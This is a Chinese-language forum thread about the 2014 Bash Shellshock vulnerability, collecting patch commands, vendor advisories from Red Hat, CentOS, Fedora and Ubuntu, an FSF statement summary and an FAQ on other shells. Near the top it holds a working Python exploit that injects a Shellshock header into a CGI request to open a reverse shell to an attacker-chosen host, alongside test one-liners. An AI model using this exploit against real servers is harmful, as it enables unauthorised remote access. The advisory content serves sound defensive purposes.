首頁 繪圖設計 工作閒聊 比賽活動 美術討論 標籤 圖片
Bash 安全性問題「SHELLSHOCK」: 2014 九月底發現,請儘速更新修補
Bash 安全性問題「SHELLSHOCK」: 2014 九月底發現,請儘速更新修補


Type(Type) 2015/1/30 17:40 (Since 2014/9/26 13:16)

Bash Security Bugs: 2014 九月底發現,請儘速更新修補

(尤其是有 CGI-BIN bash 服務的 server



簡稱:ShellShock (當然,給他一個和 HeartBleed一樣的名字)

ShellSHock 影響: All Unix/Linux/BSD/MacOS/Windows 有用 bash 都會受到影響


ShellShock BASH 影響版本:
=> bash 1.14 ~ bash 4.3 (幾乎接近是 zero-day bug)


參考:
https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/
http://seclists.org/oss-sec/2014/q3/666

修補很簡單:
@ Ubuntu / Debian
$ apt-get update;apt-get upgrade
$ apt-get update && sudo apt-get install --only-upgrade bash (單純更新 bash)

@ Fedora/CentOS/Fedora
$ yum update
$ yum update bash (只更新 bash)

當然,「安全」的前提是,還沒被用此漏洞入侵。


漏洞可能影響的 scenario
1. Apache HTTP Servers (mod_cgi and mod_cgid) + Bash CGI scripts
2. 特定的 DHCP clients
3. OpenSSH server 使用 "ForeceCommand 參數"
4. 相關網路服務,其 path 中有使用到未 patch 的 bash




Q: 如何偵測?

最簡單的 Sample Code,如下面這一行,如果你會看 "vulnerable" 被印出來,
然後才看到 this is a test
那就代表 bash 有 security bug

代碼:

$ env x='() { :;}; echo vulnerable' bash -c "echo this is a test"




Example Code #2:
代碼:

#
#CVE-2014-6271 cgi-bin reverse shell
#

import httplib,urllib,sys

if (len(sys.argv)<4):
   print "Usage: %s <host> <vulnerable CGI> <attackhost/IP>" % sys.argv[0]
   print "Example: %s localhost /cgi-bin/test.cgi 10.0.0.1/8080" % sys.argv[0]
   exit(0)

conn = httplib.HTTPConnection(sys.argv[1])
reverse_shell="() { ignored;};/bin/bash -i >& /dev/tcp/%s 0>&1" % sys.argv[3]

headers = {"Content-type": "application/x-www-form-urlencoded",
   "test":reverse_shell }
conn.request("GET",sys.argv[2],headers=headers)
res = conn.getresponse()
print res.status, res.reason
data = res.read()
print data



Example Code #3:
代碼:

$ gcc bug.c
$ env TERM='() { :;}; echo vulnerable' a.out
vulnerable
#include <stdlib.h>

int main(void)
{
    return system("cat bug.c");
}



Update your Ubuntu/Redhat/Fedora/Debian
代碼:

$ ls -al /bin/bash
-rwxr-xr-x 1 root root 959120 Mar 29  2013 /bin/bash

$ apt-get update

$ apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages have been kept back:
  linux-image-virtual
The following packages will be upgraded:
  apt apt-utils bash dbus firefox-locale-en libapt-inst1.4 libapt-pkg4.12
  libdbus-1-3 libnss3 libnss3-1d
10 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
Need to get 5,421 kB of archives.
After this operation, 10.2 kB of additional disk space will be used.
Do you want to continue [Y/n]?


%  ls -al /bin/bash
-rwxr-xr-x 1 root root 959120  Sep 23 04:39 /bin/bash

Type(Type) 2014/9/27 11:56

自由軟體基金會對於 GNU Bash "ShellShock" 發表的聲明



原文: http://www.fsf.org/news/free-software-foundation-statement-on-the-gnu-bash-shellshock-vulnerability

快速翻譯摘要如下:

1. 一個重大的 Bash 安全性問題被發現於 GNU Bash,目前已經有暫時解法;而完整的解法正在動工中。
所有使用 bash 的系統應該立即進行更新,並且監視 bash 相關的網路服務。

2. 此 Bug 俗稱為 "ShellShock",在某些特定狀況下,可以讓攻擊者取得 root 權限,不論是直接透過 bash
或者 call path 中有 bash 的(網路)應用。
可參考: NVD
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-6271
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-7169

3. 因為 GNU Bash 為自由軟體且可靠好用,所以 ShellShock 影響範圍廣泛
所幸的是是因為他是 GPL V3,所以能讓自由軟體開發者如
Red Hat 快速的回應此 bug 並分享出 patch 讓各大上游開發者能夠同步修復。

4. 每個人都可以同時自由的下載、檢視、補綴自己的 bash,
不像是微軟(Microsoft) 或者蘋果(Apple),或者其他的私有軟體。

(這篇文章還順便酸了 Microsoft & Apple 一把,不曉得 FSF 官方聲明為什麼一定要這樣...)

5. 軟體自由是安全的大前提之一,保證每個人都可以檢視並偵測自己使用程式碼的安全性,
進而改善、製造更安全的軟體。

6. 不管是自由軟體或者私有軟體,都不保證 Bug-Free;Bug 會發生,與他的「授權方式」完全無關。
然而如果是在自由軟體發現的 bug ,每個人都有權限、權力、原始代碼來進行複製與修復;
接著此 patch 很快會廣為自由免費的散佈至每個人手上。
這種自由度對於安全運算事關重大。

7. 私有軟體(非自由軟體)依賴於一個「不平等(unjust)」的開發模式,
他隱藏了原始碼,並剝奪了使用者的基本權力;這樣不僅僅讓安全缺失難以發現,
並且容易讓這些開發商故意殖入可能有害的內容,並隱藏已經發現的嚴重問題。

有報告指出,微軟曾經提供給政府的情報組織一些尚未修復的漏洞資訊。
( http://www.computerworlduk.com/blogs/open-enterprise/how-can-any-company-ever-trust-microsoft-again-3569376/

8. 自由軟體並不能保證你的安全,某些狀況下,有可能比起私有軟體更顯得容易發現漏洞。
但比起「不容易發現的漏洞」,持續的監督、改善自由軟體,才是重點。

9. BASH 和其他 GNU 軟體的開發,大部分都是由義務組織或個人義務來貢獻他們才智時間;
我們正在檢視 Bash 的開發,並看增進對於 bash 計畫的資金贊助是否能夠避免未來發生類似問題;
如果您或您的單位組織,有使用 bash 並對於支援 bash 有興趣,請聯絡我們 ( http://www.fsf.org/news/donate@fsf.org


自由軟體基金會媒體窗口 John Sullivan Executive Director
Free Software Foundation +1 (617) 542 5942 campaigns@fsf.org






Type(Type) 2014/9/27 13:41

Fedora Bash Update: Fedora 19, Fedora 20



From: updates@fedoraproject.org
To: package-announce@lists.fedoraproject.org
Subject: [SECURITY] Fedora 19 Update: bash-4.2.48-2.fc19
Date: Fri, 26 Sep 2014 09:00:48 +0000
Message-ID: <20140926090050.9FE1722338@bastion01.phx2.fedoraproject.org>
--------------------------------------------------------------------------------
Fedora Update Notification
FEDORA-2014-11514
2014-09-26 08:10:17
--------------------------------------------------------------------------------

Name : bash
Product : Fedora 19
Version : 4.2.48
Release : 2.fc19
URL : http://www.gnu.org/software/bash
Summary : The GNU Bourne Again shell
Description :
The GNU Bourne Again shell (Bash) is a shell or command language
interpreter that is compatible with the Bourne shell (sh). Bash
incorporates useful features from the Korn shell (ksh) and the C shell
(csh). Most sh scripts can be run by bash without modification.

--------------------------------------------------------------------------------
Update Information:

This build should fix cve-2014-7169
--------------------------------------------------------------------------------
ChangeLog:

* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.48-2
- CVE-2014-7169
Resolves: #1146319
+
* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.48-1
- Patchlevel 48
* Wed Sep 24 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-2
- Inhibit code injection - patch by Stephane Chazelas
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.47-1
- Patchlevel 47
* Tue Apr 1 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.46-1
- Patchlevel 46
--------------------------------------------------------------------------------
References:

[ 1 ] Bug #1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment
(Incomplete fix for CVE-2014-6271)
https://bugzilla.redhat.com/show_bug.cgi?id=1146319
--------------------------------------------------------------------------------

This update can be installed with the "yum" update program. Use
su -c 'yum update bash' at the command line.
For more information, refer to "Managing Software with yum",
available at http://docs.fedoraproject.org/yum/.

All packages are signed with the Fedora Project GPG key. More details on the
GPG keys used by the Fedora Project can be found at
https://fedoraproject.org/keys
--------------------------------------------------------------------------------

From: updates@fedoraproject.org
To: package-announce@lists.fedoraproject.org
Subject: [SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20
Date: Fri, 26 Sep 2014 09:03:00 +0000
Message-ID: <20140926090302.6FC4121113@bastion01.phx2.fedoraproject.org>
--------------------------------------------------------------------------------
Fedora Update Notification
FEDORA-2014-11527
2014-09-26 08:10:45
--------------------------------------------------------------------------------

Name : bash
Product : Fedora 20
Version : 4.2.48
Release : 2.fc20
URL : http://www.gnu.org/software/bash
Summary : The GNU Bourne Again shell
Description :
The GNU Bourne Again shell (Bash) is a shell or command language
interpreter that is compatible with the Bourne shell (sh). Bash
incorporates useful features from the Korn shell (ksh) and the C shell
(csh). Most sh scripts can be run by bash without modification.

--------------------------------------------------------------------------------
Update Information:

This build should fix cve-2014-7169
--------------------------------------------------------------------------------
ChangeLog:

* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com> - 4.2.48-2
- CVE-2014-7169
Resolves: #1146319
+
* Thu Sep 25 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.48-1
- Patchlevel 48
* Wed Sep 24 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-4
- Inhibit code injection - patch by Stephane Chazelas
* Mon Jul 21 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-3
- Mention ulimit -c and -f block size in POSIX mode
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-2
- Proper patchlevel 47
* Tue Apr 15 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.47-1
- Patchlevel 47
* Tue Apr 1 2014 Ondrej Oprala <ooprala@redhat.com - 4.2.46-1
- Patchlevel 46
--------------------------------------------------------------------------------
References:

[ 1 ] Bug #1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment
(Incomplete fix for CVE-2014-6271)
https://bugzilla.redhat.com/show_bug.cgi?id=1146319
--------------------------------------------------------------------------------

This update can be installed with the "yum" update program. Use
su -c 'yum update bash' at the command line.
For more information, refer to "Managing Software with yum",
available at http://docs.fedoraproject.org/yum/.

All packages are signed with the Fedora Project GPG key. More details on the
GPG keys used by the Fedora Project can be found at
https://fedoraproject.org/keys
--------------------------------------------------------------------------------

CentOS 5 / CentOS 6 / CentOS 7


From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 5 bash Security Update
Date: Fri, 26 Sep 2014 02:16:02 +0000
Message-ID: <20140926021602.GA3213@chakra.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html


The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

i386:
9755e86ad8536c908f95340be308190b52989bfa0d9268a461c40a3f0d493bc7 bash-3.2-33.el5_10.4.i386.rpm

x86_64:
b1e14edd0d675c6fb0be64cb875fbd9fac208a58e427ea32f373c9359b35642c bash-3.2-33.el5_10.4.x86_64.rpm

Source:
b71bd90354d2724f256f9f23e113eea89c98b3ce923380657461cb78d34ab8da bash-3.2-33.el5_10.4.src.rpm



--
Johnny Hughes
CentOS Project { http://www.centos.org/ }
irc: hughesjr, #centos@irc.freenode.net


From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 6 bash Security Update
Date: Fri, 26 Sep 2014 02:24:20 +0000
Message-ID: <20140926022420.GA62097@n04.lon1.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html


The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

i386:
28a674dd09ca395b3021749ebf8928806ae981a325c02b8ead070e75cdae2cab bash-4.1.2-15.el6_5.2.i686.rpm
333f57db85ea63636650d1b491c07a5d0ccb722e9353db5f22a62685d96c9da7
bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
72fb8fa60fce9ccd1f221ace44d7a29870856d9033819d2c3e75885881cf6a4a
bash-4.1.2-15.el6_5.2.x86_64.rpm
18cde2ec120c8d351c60ae3901bb6706f4c97abbf2b87cdec5ed1ba4175c84a2
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Source:
d0a8f52d7db4c729c17188a2bd690aff2371f8ac86900dabb14b0df5aa1ff6a5 bash-4.1.2-15.el6_5.2.src.rpm

From: Johnny Hughes <johnny@centos.org>
To: centos-announce@centos.org
Subject: [CentOS-announce] CESA-2014:1306 Important CentOS 7 bash Security Update
Date: Fri, 26 Sep 2014 02:23:24 +0000
Message-ID: <20140926022324.GA61885@n04.lon1.karan.org>

CentOS Errata and Security Advisory 2014:1306 Important

Upstream details at : https://rhn.redhat.com/errata/RHSA-2014-1306.html


The following updated files have been uploaded and are currently
syncing to the mirrors: ( sha256sum Filename )

x86_64:
d2806c39117791707b6f528afd2bfa35b20a67f6ad40231057d6dd27f4eb7e36
bash-4.2.45-5.el7_0.4.x86_64.rpm
9a66662961d2a359b71387436b03e1e951473b10dbf450e480c6787d584dc70e
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Source:
b37570f9434b82c9f2df7920b1ab94e00039370b58ee1ab2c2235eeda53b88fb bash-4.2.45-5.el7_0.4.src.rpm


Red Hat v5, Red Hat v6, Red Hat v7 BASH Update



From: bugzilla@redhat.com
To: rhsa-announce@redhat.com, enterprise-watch-list@redhat.com
Subject: [RHSA-2014:1306-01] Important: bash security update
Date: Fri, 26 Sep 2014 02:02:30 +0000
Message-ID: <201409260154.s8Q1s9AP014275@int-mx13.intmail.prod.int.phx2.redhat.com>
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

=====================================================================
Red Hat Security Advisory

Synopsis: Important: bash security update
Advisory ID: RHSA-2014:1306-01
Product: Red Hat Enterprise Linux
Advisory URL: https://rhn.redhat.com/errata/RHSA-2014-1306.html

Issue date: 2014-09-26
CVE Names: CVE-2014-7169
=====================================================================

1. Summary:

Updated bash packages that fix one security issue are now available for Red
Hat Enterprise Linux 5, 6, and 7.

Red Hat Product Security has rated this update as having Important security
impact. A Common Vulnerability Scoring System (CVSS) base score, which
gives a detailed severity rating, is available from the CVE link in the
References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux (v. 5 server) - i386, ia64, ppc, s390x, x86_64
Red Hat Enterprise Linux Client (v. 7) - x86_64
Red Hat Enterprise Linux Client Optional (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode (v. 7) - x86_64
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64
Red Hat Enterprise Linux Desktop (v. 5 client) - i386, x86_64
Red Hat Enterprise Linux Desktop (v. 6) - i386, x86_64
Red Hat Enterprise Linux Desktop Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux HPC Node (v. 6) - x86_64
Red Hat Enterprise Linux HPC Node Optional (v. 6) - x86_64
Red Hat Enterprise Linux Server (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 6) - i386, ppc64, s390x, x86_64
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, s390x, x86_64
Red Hat Enterprise Linux Workstation (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation (v. 7) - x86_64
Red Hat Enterprise Linux Workstation Optional (v. 6) - i386, x86_64
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

The GNU Bourne Again shell (Bash) is a shell and command language
interpreter compatible with the Bourne shell (sh). Bash is the default
shell for Red Hat Enterprise Linux.

It was found that the fix for CVE-2014-6271 was incomplete, and Bash still
allowed certain characters to be injected into other environments via
specially crafted environment variables. An attacker could potentially use
this flaw to override or bypass environment restrictions to execute shell
commands. Certain services and applications allow remote unauthenticated
attackers to provide environment variables, allowing them to exploit this
issue. (CVE-2014-7169)

Applications which directly create bash functions as environment variables
need to be made aware of changes to the way names are handled by this
update. For more information see the Knowledgebase article at
https://access.redhat.com/articles/1200223


Note: Docker users are advised to use "yum update" within their containers,
and to commit the resulting changes.

For additional information on CVE-2014-6271 and CVE-2014-7169, refer to the
aforementioned Knowledgebase article.

All bash users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue.

4. Solution:

Before applying this update, make sure all previously released errata
relevant to your system have been applied.

This update is available via the Red Hat Network. Details on how to use the
Red Hat Network to apply this update are available at
https://access.redhat.com/articles/11258


5. Bugs fixed ( https://bugzilla.redhat.com/):

1146319 - CVE-2014-7169 bash: code execution via specially-crafted environment (Incomplete fix for
CVE-2014-6271)

6. Package List:

Red Hat Enterprise Linux Desktop (v. 5 client):

Source:
bash-3.2-33.el5_11.4.src.rpm

i386:
bash-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm

x86_64:
bash-3.2-33.el5_11.4.x86_64.rpm
bash-debuginfo-3.2-33.el5_11.4.x86_64.rpm

Red Hat Enterprise Linux (v. 5 server):

Source:
bash-3.2-33.el5_11.4.src.rpm

i386:
bash-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm

ia64:
bash-3.2-33.el5_11.4.i386.rpm
bash-3.2-33.el5_11.4.ia64.rpm
bash-debuginfo-3.2-33.el5_11.4.i386.rpm
bash-debuginfo-3.2-33.el5_11.4.ia64.rpm

ppc:
bash-3.2-33.el5_11.4.ppc.rpm
bash-debuginfo-3.2-33.el5_11.4.ppc.rpm

s390x:
bash-3.2-33.el5_11.4.s390x.rpm
bash-debuginfo-3.2-33.el5_11.4.s390x.rpm

x86_64:
bash-3.2-33.el5_11.4.x86_64.rpm
bash-debuginfo-3.2-33.el5_11.4.x86_64.rpm

Red Hat Enterprise Linux Desktop (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Desktop Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux HPC Node Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Server (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

ppc64:
bash-4.1.2-15.el6_5.2.ppc64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.ppc64.rpm

s390x:
bash-4.1.2-15.el6_5.2.s390x.rpm
bash-debuginfo-4.1.2-15.el6_5.2.s390x.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

ppc64:
bash-debuginfo-4.1.2-15.el6_5.2.ppc64.rpm
bash-doc-4.1.2-15.el6_5.2.ppc64.rpm

s390x:
bash-debuginfo-4.1.2-15.el6_5.2.s390x.rpm
bash-doc-4.1.2-15.el6_5.2.s390x.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-4.1.2-15.el6_5.2.i686.rpm
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-4.1.2-15.el6_5.2.x86_64.rpm
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 6):

Source:
bash-4.1.2-15.el6_5.2.src.rpm

i386:
bash-debuginfo-4.1.2-15.el6_5.2.i686.rpm
bash-doc-4.1.2-15.el6_5.2.i686.rpm

x86_64:
bash-debuginfo-4.1.2-15.el6_5.2.x86_64.rpm
bash-doc-4.1.2-15.el6_5.2.x86_64.rpm

Red Hat Enterprise Linux Client (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

ppc64:
bash-4.2.45-5.el7_0.4.ppc64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.ppc64.rpm

s390x:
bash-4.2.45-5.el7_0.4.s390x.rpm
bash-debuginfo-4.2.45-5.el7_0.4.s390x.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

ppc64:
bash-debuginfo-4.2.45-5.el7_0.4.ppc64.rpm
bash-doc-4.2.45-5.el7_0.4.ppc64.rpm

s390x:
bash-debuginfo-4.2.45-5.el7_0.4.s390x.rpm
bash-doc-4.2.45-5.el7_0.4.s390x.rpm

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:
bash-4.2.45-5.el7_0.4.src.rpm

x86_64:
bash-4.2.45-5.el7_0.4.x86_64.rpm
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:
bash-debuginfo-4.2.45-5.el7_0.4.x86_64.rpm
bash-doc-4.2.45-5.el7_0.4.x86_64.rpm

These packages are GPG signed by Red Hat for security. Our key and
details on how to verify the signature are available from
#package">https://access.redhat.com/security/team/key/#package


7. References:

https://www.redhat.com/security/data/cve/CVE-2014-7169.html

https://access.redhat.com/security/updates/classification...
https://access.redhat.com/articles/1200223


8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact
details at https://access.redhat.com/security/team/contact/


Copyright 2014 Red Hat, Inc.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iD8DBQFUJMc4XlSAg2UNWIIRAsowAKCeLFE4QctUYTBC7bvqd6RTgUMptACcC2jt
wqMN2oFvaGhf5SqiZHqpyOA=
=Unt1
-----END PGP SIGNATURE-----


Ubuntu 10.04 / 12.04 / 14.04 BASH Update


From: Marc Deslauriers <marc.deslauriers@canonical.com>
To: ubuntu-security-announce@lists.ubuntu.com
Subject: [USN-2363-1] Bash vulnerability
Date: Thu, 25 Sep 2014 18:35:21 -0400
Message-ID: <542498A9.6020900@canonical.com>
==========================================================================
Ubuntu Security Notice USN-2363-1
September 25, 2014

bash vulnerability
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 14.04 LTS
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS

Summary:

Bash allowed bypassing environment restrictions in certain environments.

Software Description:
- bash: GNU Bourne Again SHell

Details:

Tavis Ormandy discovered that the security fix for Bash included in
USN-2362-1 was incomplete. An attacker could use this issue to bypass
certain environment restrictions. (CVE-2014-7169)

Update instructions:

The problem can be corrected by updating your system to the following
package versions:

Ubuntu 14.04 LTS:
bash 4.3-7ubuntu1.2

Ubuntu 12.04 LTS:
bash 4.2-2ubuntu2.3

Ubuntu 10.04 LTS:
bash 4.1-2ubuntu3.2

In general, a standard system update will make all the necessary changes.

References:
http://www.ubuntu.com/usn/usn-2363-1

CVE-2014-7169

Package Information:
https://launchpad.net/ubuntu/+source/bash/4.3-7ubuntu1.2

https://launchpad.net/ubuntu/+source/bash/4.2-2ubuntu2.3

https://launchpad.net/ubuntu/+source/bash/4.1-2ubuntu3.2
Type(Type) 2014/9/27 15:57 (Since 2014/9/27 14:33)

Related ShellShock References



Type(Type) 2014/9/27 14:40

Ubuntu 10.04/12.04/14.04 有新的更新



代碼:


$ ls -al /bin/bash
-rwxr-xr-x 1 root root 959120  Sep 23 04:39 /bin/bash

$ md5sum /bin/bash
d63ff62f142e76205e89e4a4de553fec  /bin/bash

$ apt-get upgrade
[14:38] > apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
The following packages will be upgraded:
  bash grub-common
2 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
Need to get 2,715 kB of archives.
After this operation, 0 B of additional disk space will be used.
Do you want to continue [Y/n]? y
Get:1 http://archive.ubuntu.com/ubuntu/ precise-updates/main bash amd64 4.2-2ubuntu2.3 [641 kB]
Get:2 http://archive.ubuntu.com/ubuntu/ precise-updates/main grub-common amd64 1.99-21ubuntu3.17 [2,074 kB]
Fetched 2,715 kB in 2s (1,129 kB/s)
(Reading database ... 29737 files and directories currently installed.)
Preparing to replace bash 4.2-2ubuntu2.2 (using .../bash_4.2-2ubuntu2.3_amd64.deb) ...
Unpacking replacement bash ...
Processing triggers for man-db ...
Setting up bash (4.2-2ubuntu2.3) ...
update-alternatives: using /usr/share/man/man7/bash-builtins.7.gz to provide /usr/share/man/man7/builtins.7.gz (builtins.7.gz) in auto mode.
(Reading database ... 29737 files and directories currently installed.)
Preparing to replace grub-common 1.99-21ubuntu3.16 (using .../grub-common_1.99-21ubuntu3.17_amd64.deb) ...
Unpacking replacement grub-common ...
Processing triggers for ureadahead ...
Processing triggers for man-db ...
Setting up grub-common (1.99-21ubuntu3.17) ...


$  ls -al /bin/bash
-rwxr-xr-x 1 root root 959120  Sep 25 14:50 /bin/bash




$ md5sum /bin/bash
5ee533c7cd3a8246b4a3d7a29ffbe0b2 /bin/bash (Ubuntu 12.04 LTS x86_64 bash)

$ md5sum /bin/bash
eb8a956c0a1164b84262505a629e8a1f /bin/bash (Ubuntu 14.04 LTS x86_64 bash)
Type(Type) 2014/9/28 10:24


bash update 09/28



代碼:

$ apt-get upgrade
Reading package lists... Done
Building dependency tree
Reading state information... Done
Calculating upgrade... Done
The following packages will be upgraded:
  bash
1 upgraded, 0 newly installed, 0 to remove and 0 not upgraded.
Need to get 576 kB of archives.
After this operation, 8192 B of additional disk space will be used.
Do you want to continue? [Y/n] y
Preparing to unpack .../bash_4.3-7ubuntu1.4_amd64.deb ...
Unpacking bash (4.3-7ubuntu1.4) over (4.3-7ubuntu1.3) ...
Processing triggers for man-db (2.6.7.1-1) ...
Processing triggers for install-info (5.2.0.dfsg.1-2) ...
Setting up bash (4.3-7ubuntu1.4) ...
update-alternatives: using /usr/share/man/man7/bash-builtins.7.gz to provide /usr/share/man/man7/builtins.7.gz (builtins.7.gz) in auto mode

$ ls -al /bin/bash
-rwxr-xr-x 1 root root 1021112  Sep 27 16:04 /bin/bash

$ md5sum /bin/bash
b81de36b3ef3bb64229833c055560c0f  /bin/bash

$ bash --version
GNU bash, version 4.3.11(1)-release (x86_64-pc-linux-gnu)
Copyright (C) 2013 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>

This is free software; you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.


service(staff) 2014/10/9 13:52

David Wheeler 對於 Shellshock 的調查論文 (2014/10/08)




建議閱讀
=> http://www.dwheeler.com/essays/shellshock.html

更多延伸閱讀:
https://host-project.org/content/are-you-open-being-shell-shocked
http://www.itnews.com.au/News/396197,first-shellshock-botnet-attacks-akamai-us-dod-networks.aspx
http://en.wikipedia.org/wiki/Shellshock

http://www.futuresouth.us/wordpress/?p=5 (Yahoo! 疑似被入侵)




最常被問到的 Shellshock 問題 (ash, tcsh, csh, mksh)



Q: 我們家的某某 OOXX Embedded Box 的 Shell (not bash!) 是否有此問題?

Ans1:
=> 假設系統使用 Busybox 環境,那理論上應該不用擔心,Busybox Shell 是 "ash" 無此問題
=> http://en.wikipedia.org/wiki/Almquist_shell


Ans2:
=> 假設是 Android OS,那理論上應該不用擔心,Android 是用 "mksh"
=> http://www.all-things-android.com/content/mirbsd-korn-shell-android-shell


Ans3:
==> 其他如 "csh" "tcsh",一般來講,並「沒有」在這次受災範圍內,
除非你有特別去 patch 他;
因為這次的 bash bug 是一個特殊的 function import/export 功能引起,
其他 shell 如果沒有此功能,理論上不用擔心。



(11,716 views)
[更多討論] 討論區 Windows, Linux, Perl, PHP, C/C++, Driver, Web 理論、應用、硬體、軟體

"Bash 安全性問題「SHELLSHOCK」: 2014 九月底發現,請儘速更新修補" 傳統頁面(電腦版)

首頁 繪圖設計 工作閒聊 比賽活動 美術討論 標籤 圖片
傳統桌面版 [ 登入/註冊 ]
